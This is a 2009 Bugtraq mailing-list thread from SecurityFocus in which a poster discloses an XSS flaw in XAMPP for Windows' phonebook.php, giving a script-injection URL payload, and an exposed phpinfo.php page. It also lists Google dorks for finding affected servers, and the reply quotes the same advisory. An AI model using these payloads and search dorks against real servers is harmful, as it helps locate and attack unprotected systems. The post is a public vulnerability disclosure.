Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
Jun 30 2009 03:21PM
Cru3l.b0y (cru3l b0y gmail com)
(1 replies)
Hi Dear,
I found new bug.please publish it.exploit attached to mail.
Best Regards.
# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
# AUTHOR : Cru3l.b0y
# DATE : 05 APR 2009
# SITE : WwW.DeltaHacking.Net
# CONTACT : Cru3l.b0y (at) deltahacking (dot) net [email concealed]
#####################################################
# APPLICATION : XAMPP for Windows
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4
# DOWNLO : http://www.apachefriends.org/en/xampp-windows.html
# VENDOR : http://www.apachefriends.org/
#####################################################
[+] Xss:
Dork : inurl:"/xampp/phonebook.php"
Exploit :
Vulnerability is in phonebook. First go to site.com/xampp/phonebook.php
now write your script in First name or Phone number box and press ADD. Your script will run successfully.
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<scrip
t>alert(123);</script>&phone=<script>alert(123);</script>
[+] PHPinfo:
Dork : inurl:"/xampp/phpinfo.php"
Exploit : http://127.0.0.1/xampp/phpinfo.php
########################################################################
######################
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in DeltaHacking.Net #
########################################################################
######################
[ reply ]
Re: XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
Jul 01 2009 05:08PM
Vladimir '3APA3A' Dubrovin (3APA3A SECURITY NNOV RU)
Privacy Statement
Copyright 2009, SecurityFocus
I found new bug.please publish it.exploit attached to mail.
Best Regards.
# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
# AUTHOR : Cru3l.b0y
# DATE : 05 APR 2009
# SITE : WwW.DeltaHacking.Net
# CONTACT : Cru3l.b0y (at) deltahacking (dot) net [email concealed]
#####################################################
# APPLICATION : XAMPP for Windows
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4
# DOWNLO : http://www.apachefriends.org/en/xampp-windows.html
# VENDOR : http://www.apachefriends.org/
#####################################################
[+] Xss:
Dork : inurl:"/xampp/phonebook.php"
Exploit :
Vulnerability is in phonebook. First go to site.com/xampp/phonebook.php
now write your script in First name or Phone number box and press ADD. Your script will run successfully.
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<scrip
t>alert(123);</script>&phone=<script>alert(123);</script>
[+] PHPinfo:
Dork : inurl:"/xampp/phpinfo.php"
Exploit : http://127.0.0.1/xampp/phpinfo.php
########################################################################
######################
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in DeltaHacking.Net #
########################################################################
######################
[ reply ]